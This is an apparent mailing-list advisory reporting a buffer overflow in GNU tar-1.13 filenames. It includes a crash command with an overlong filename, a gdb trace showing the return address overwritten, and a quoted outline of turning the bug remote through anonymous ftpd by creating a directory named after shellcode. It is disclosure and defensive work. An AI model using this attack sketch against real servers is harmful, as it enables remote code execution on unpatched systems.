buffer overflow in GNU tar-1.13

[Antonomasia]

Software Maintainers,

GNU tar-1.13 contains a buffer overflow in output filenames where rsh
(or similar commands) are called.  (The rsh connection is not required
to succeed to demonstrate this bug.)

I published an exploit of this form for tar-1.12 in February 1999 on
the linux-security-audit list.  I think I also notified a bugs address
at GNU around the same time but can find no record of this.
Because tar is not set[ug]id and this overflow is on the command line
(rather than in handling a file you might receive) I considered it a
curiousity with no security implications.  Interaction with ftpd would
change that model drastically as mentioned at the end of this email.


$ ./tar cvf 
localhost:/ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZABCDEFGHI 
/tmp
sh: Host name lookup failure
Segmentation fault (core dumped)


$ gdb ./tar core
GNU gdb 4.17
Core was generated by `./tar cvf 
localhost:/ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ'.
Program terminated with signal 11, Segmentation fault.
find_solib: Can't read pathname for load map: Input/output error

#0  0x35360a49 in ?? ()
(gdb) bt
#0  0x35360a49 in ?? ()
Cannot access memory at address 0x48474645.


Alan Cox pointed out (in 1999) implications for interaction with ftpd.

AC> I've raised this one with Cert, but not to the list because there is a true
AC> horror of a problem you've found.
AC> 
AC> Consider
AC> 
AC> ftp some.site.net
AC> login anonymous
AC> password blahblah
AC> cd incoming
AC> mkdir $EGG
AC> get $EGG.tar


--
##############################################################
# Antonomasia   address@hidden                      #
# See http://www.notatla.demon.co.uk/                        #
##############################################################